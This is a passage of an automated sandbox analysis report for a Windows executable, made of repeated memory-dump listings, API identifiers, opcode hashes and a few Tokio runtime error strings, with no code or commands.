                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 40080c43c57aa7fb1bf8c7486d08a0061f60c7773b572f3078eaab9e88b25c13
                                            • Instruction ID: 62c8a2243325091ea7f9b95b4df4e86e823295df5a686f34f9f65514c020df37
                                            • Opcode Fuzzy Hash: 40080c43c57aa7fb1bf8c7486d08a0061f60c7773b572f3078eaab9e88b25c13
                                            • Instruction Fuzzy Hash: 5951301290CAC280E771D726D4A43FA6BA0EB85748F4C40B6D68DA77F6CF6CE544C741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: e6bd678c7bed30235cd16d0b905a436f501656e9f82aca00891f2a90fea4d8e5
                                            • Instruction ID: 00fdc7c137368d67a49b99030aadfd388e4963b6f9d798ffca0a5d2d5b51fe45
                                            • Opcode Fuzzy Hash: e6bd678c7bed30235cd16d0b905a436f501656e9f82aca00891f2a90fea4d8e5
                                            • Instruction Fuzzy Hash: 6B513F1290CAC280E771D726D4A43FA6BA0EB85B48F4C40B6D68DA77F6CF6CE584C741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 95da64d48cd0c021f4db1dedb3ed016f386c976ec0ffed5b4ed9c5497422dbac
                                            • Instruction ID: 04e6fdd195b7329cca9f5480ec7dcbbd44f35c3be3515f4581262fb2ac2e8b37
                                            • Opcode Fuzzy Hash: 95da64d48cd0c021f4db1dedb3ed016f386c976ec0ffed5b4ed9c5497422dbac
                                            • Instruction Fuzzy Hash: 33513F1290CAC280E771D726D4A43FA6BA0EB85B48F4C40B6D68DA77F6CF6CD584C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 21adf36d68a70a48112eb1f9e08665789bb409efa999fbcbba99273b12ee72f0
                                            • Instruction ID: 2a4cbf88174e4787c999a10910102a6ac34516ecfdff21f6a4b4f1674bd2cfcb
                                            • Opcode Fuzzy Hash: 21adf36d68a70a48112eb1f9e08665789bb409efa999fbcbba99273b12ee72f0
                                            • Instruction Fuzzy Hash: 4851205290CA8280E771D726D0A43FA6BA0EB85788F4C40B6D68DA77F6CF6CE544D741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: fe1c741f1655fdf2429b2514e3257bd0dbbeb9b0c523711fb5cbc11bc9101571
                                            • Instruction ID: a7b69225a9cc09d3a7d6ba665d1fe9f9624fa5c4a2d4167e6f5916d5e97a5bca
                                            • Opcode Fuzzy Hash: fe1c741f1655fdf2429b2514e3257bd0dbbeb9b0c523711fb5cbc11bc9101571
                                            • Instruction Fuzzy Hash: 3B51215190CA8280E771D726D0A43FA6BA0EB85B48F4C40B6DA8DA77F6CF7CE584D741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 21890b9d4a6b8654fb819f7b0972d12df4f99dd9a28518633b344baa8212f495
                                            • Instruction ID: d3fae15dc357a7dcd2b83cc473664ebbd923c0a708b52f2df900a894f7600cd2
                                            • Opcode Fuzzy Hash: 21890b9d4a6b8654fb819f7b0972d12df4f99dd9a28518633b344baa8212f495
                                            • Instruction Fuzzy Hash: 2B51305190CA8280E771D726D0A43FA6BA0EB85B48F4C40B6DA8DA77F6CF7CE584D741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: be290b61f396834e0e4316d45b25a6ad824a30d565bbdf900ac68346f141619b
                                            • Instruction ID: d428c02a320817308c25e0df70da2bd1d7afbe64dc48cbec0dcb922454cba193
                                            • Opcode Fuzzy Hash: be290b61f396834e0e4316d45b25a6ad824a30d565bbdf900ac68346f141619b
                                            • Instruction Fuzzy Hash: FA51435190CA8280E771D726D0A43FA6BA0EB85B48F0C40B6DA8D977F6CF7CE584D741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c7c261addf2f576dc0fdb33e54d9ac23719414da4cd3cbef89bf0cf5238d1e5e
                                            • Instruction ID: 9a9f8d3e6be45188cd239bf79e965b934b4bfef0f96f3846bd2d185d19501d8b
                                            • Opcode Fuzzy Hash: c7c261addf2f576dc0fdb33e54d9ac23719414da4cd3cbef89bf0cf5238d1e5e
                                            • Instruction Fuzzy Hash: 0151325190CA8280E771D726D0A43FA6BA0EB85B58F0C40B6DA8D977F6CF7CE584D741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c213be5052421592765c8b2da513232b14e1bfd3e943414d129abddeb035730f
                                            • Instruction ID: cec7d10c153e69aac3ec477e4cb06932e59541bc6cff4aa27dd230e7b204b6d7
                                            • Opcode Fuzzy Hash: c213be5052421592765c8b2da513232b14e1bfd3e943414d129abddeb035730f
                                            • Instruction Fuzzy Hash: 77414225908E9180E721DB16D0E03B967A1EB89B94F0D40B6DA8DA7BA5CF7CE584D740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 164ce5dec6ebe9764fcf749cea871a66f8d48e5da602842791513bbe91ab9563
                                            • Instruction ID: d7bfd91e3294c49ada410268b023f30e1b41932173614608a656b4927f062c34
                                            • Opcode Fuzzy Hash: 164ce5dec6ebe9764fcf749cea871a66f8d48e5da602842791513bbe91ab9563
                                            • Instruction Fuzzy Hash: F6415325908E9180E721DB16D0D43B967A1EB89F94F0D40B5DA8DA7BA5CF7CE184D300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 246c6a396cb9eeb43d2630f4e3eb5807ef4647f619f3b974c5b6ca81ac246385
                                            • Instruction ID: f5914111e703c2ea6adea6406418ddcd8fd87fc40aad4c0231bbb570a5490f0e
                                            • Opcode Fuzzy Hash: 246c6a396cb9eeb43d2630f4e3eb5807ef4647f619f3b974c5b6ca81ac246385
                                            • Instruction Fuzzy Hash: C0315525908E9180E721DB16D0D03F967A1EB89F94F0D40B5DE8DA7BA9CF7CE584D700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 23627a474f59db26a25543ed25a15f5087637e7a20bf52a4e0ea604a46e7a2c5
                                            • Instruction ID: 5ddaf6bf9d60cd6b8872e5db0c48637304c53fc73f847ced69c18e9b512e41bd
                                            • Opcode Fuzzy Hash: 23627a474f59db26a25543ed25a15f5087637e7a20bf52a4e0ea604a46e7a2c5
                                            • Instruction Fuzzy Hash: D2315325908E9180E721DB16D0E03F967A1EB89F94F0D40B6DE8DA7BA9CF7CE184D700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 77194b6b9a3792aa7393b0e36a812df2dcf69198d15d8b45799d2e2738b88a41
                                            • Instruction ID: 5ddaf6bf9d60cd6b8872e5db0c48637304c53fc73f847ced69c18e9b512e41bd
                                            • Opcode Fuzzy Hash: 77194b6b9a3792aa7393b0e36a812df2dcf69198d15d8b45799d2e2738b88a41
                                            • Instruction Fuzzy Hash: D2315325908E9180E721DB16D0E03F967A1EB89F94F0D40B6DE8DA7BA9CF7CE184D700
                                            Strings
                                            • failed to wake I/O driver, xrefs: 00007FF654396A54
                                            • A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi, xrefs: 00007FF654396AAC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: AddressFreeHeapSingleWake
                                            • String ID: A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi$failed to wake I/O driver
                                            • API String ID: 1757495356-3400405205
                                            • Opcode ID: fc30c2f13a113f76cf75717aca289d6f60c723888206ec3cd8a9d427e0866275
                                            • Instruction ID: 62fa33d9a7907fb65e8c820292291145f1de9cfc52ec90b87267ecb29c8e2f79
                                            • Opcode Fuzzy Hash: fc30c2f13a113f76cf75717aca289d6f60c723888206ec3cd8a9d427e0866275
                                            • Instruction Fuzzy Hash: C741E762909A0241EA64EF22E4A12B92360FF54774F584371EE7EA73E5DF3CE452C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FrequencyPerformanceQuery
                                            • String ID: called `Result::unwrap()` on an `Err` value
                                            • API String ID: 1045536338-2333694755
                                            • Opcode ID: f59ce97d3ce8aad52cdee8abe74319df40171c186f530ef3623f502aa073c4ee
                                            • Instruction ID: 2d33690446749be3e4c1c4d0c13bc4b8c1b61af576eb3f0ebc9c578dc67b2dd4
                                            • Opcode Fuzzy Hash: f59ce97d3ce8aad52cdee8abe74319df40171c186f530ef3623f502aa073c4ee
                                            • Instruction Fuzzy Hash: 4131C761B09A4666FF04DB61D8A13F923A1EF84784F0C81B2DC4DA7799DE3CA502C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID:
                                            • API String ID: 3510742995-0
                                            • Opcode ID: 044e0a7898cbe1a5b455308b53eb9a7407f1c6d58fc5aed5f72682bcaac4021c
                                            • Instruction ID: 7ce9a6ec203bae051694fb1f8f20f946a396d090f68e044ce2bb4c67fddd5ad3
                                            • Opcode Fuzzy Hash: 044e0a7898cbe1a5b455308b53eb9a7407f1c6d58fc5aed5f72682bcaac4021c
                                            • Instruction Fuzzy Hash: 33B11722A09BD182E7528B16D0947FE2764FB55B84F895072DF9DA37A2EF3DD285C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID:
                                            • API String ID: 3510742995-0
